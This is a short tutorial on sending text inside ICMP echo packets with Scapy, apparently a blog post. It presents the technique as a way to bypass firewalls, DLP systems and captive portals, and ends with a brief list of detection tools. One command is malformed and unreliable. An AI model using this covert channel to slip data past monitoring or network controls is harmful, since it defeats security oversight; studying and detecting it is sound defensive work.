How to send text message by ICMP tunnel by SCAPY

DISCLAIMER: Please use this article for study purposes only. I provide this information for Administrators who want to be more effective in their job.

Folks, I want to share with you an amazing technology — ICMP Tunnels. It was developed to bypass firewalls, DLP systems, and the main reason for its development is to use free Wi-Fi (captive portals). To do this, you need two PCs and Python3. In my case, I used Python virtual environment (venv). Install scapy using pip on both hosts. Then, log in to the scapy interactive shell and execute the following commands on the sender side:

packet = IP(dpacket = IP(dst=”X.X.X.X”)/ICMP()/ “Hi there” where X.X.X.X is an IPv4 IP address and “Hi there” can be any text. After you set up and execute that command, you need to send it using the command send(packet).

Of course, it does not work if you can’t sniff it. To do that, you need to sniff incoming traffic using the scapy method sniff(lfilter=lambda pkt: ICMP in pkt) to check each IP packet and see if it contains ICMP as payload data. In my case (Virtual Laboratory), I sniff on all interfaces, which means I didn’t specify it in the command: a=_ However, you may use that command to specify the interface iface=”en1", and, iface=”en1", filter = “icmp”, count = 12. The a=_ assigns the variable a to hold the output of the sniff() function. The underscore ( _ ) in Python is used to temporarily hold the output of the last function executed and an additional method: a.nsummary() to visualize them.

And after that, you can visualize the packet by choosing an element from the array list a[1].

>>> a[1]

<Ether dst=60:45:bd:ab:cd:ef src=ab:34:56:cd:ef:fe type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=36 id=1 flags= frag=0 ttl=48 proto=icmp chksum=0x3b5c src=172.103.X.X dst=10.0.0.4 |<ICMP type=echo-request code=0 chksum=0xb457 id=0x0 seq=0x0 unused=’’ |<Raw load=’Hi there’ |<Padding load=’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>>

I like Scappy, because it is powerful tool for craft IP packets, ICMP, TCP segments. So attacker can use it to bypass DLP systems.

How to protect? i.e. SIEM tools like Splunk, or Wireshark, IDS/IPS, Sonar or Suricata, etc., Machine Learning IDS/IPS or traffic analyzer. I prepared some screenshots for you where I had specified crafted ICMP packets. Those contain maximum bytes payload that I sent. Please note that there are no ‘no response found!’ And it means the remote host did not respond. For Network or Sys. Admin, it should surely be a flag to start investigating immediately.